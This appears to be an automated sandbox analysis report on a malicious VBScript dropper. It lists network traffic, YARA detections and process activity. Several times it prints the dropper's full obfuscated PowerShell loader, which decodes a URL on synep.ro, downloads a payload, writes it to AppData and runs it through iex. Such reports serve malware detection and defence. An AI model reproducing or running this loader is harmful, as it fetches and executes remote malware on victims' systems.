              Source: global trafficHTTP traffic detected: GET /Lysbad.psp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: synep.roConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: gormezl_6777.6777.6777.677e
              Source: global trafficDNS traffic detected: DNS query: synep.ro
              Source: powershell.exe, 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000004.00000002.2161420250.0000028015C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3326639658.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000004.00000002.2161420250.000002801798D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://synep.ro
              Source: powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000004.00000002.2161420250.0000028015C11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.3326639658.0000000004821000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
              Source: powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000004.00000002.2161420250.00000280167C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000004.00000002.2161420250.00000280171C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2161420250.0000028015E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://synep.ro
              Source: powershell.exe, 00000004.00000002.2161420250.0000028015E38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://synep.ro/Lysbad.pspP
              Source: powershell.exe, 00000006.00000002.3326639658.0000000004977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://synep.ro/Lysbad.pspXR
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 31.14.12.249:443 -> 192.168.2.5:49704 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: amsi32_3228.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3136, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Windows Scripting host queries suspicious COM object (likely to drop second stage)
              Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}Jump to behavior
              Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
              Wscript starts Powershell (via cmd or directly)
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcu
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcuJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BDB1064_2_00007FF848BDB106
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848BDBEB24_2_00007FF848BDBEB2
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0456EDF06_2_0456EDF0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0456F6C06_2_0456F6C0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_0456EAA86_2_0456EAA8
              Source: O1CZjzItH1.vbsInitial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6448
              Source: unknownProcess created: Commandline size = 6448
              Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6448Jump to behavior
              Source: amsi32_3228.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3136, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 3228, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.expl.evad.winVBS@9/7@2/1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Udviklingsegnes.sepJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tgahyxoc.kig.ps1Jump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs"
              Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = &apos;windsock.exe&apos;
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3136
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3228
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: O1CZjzItH1.vbsReversingLabs: Detection: 28%
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: C:\Windows\System32\PING.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcu
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcu
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677eJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcuJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
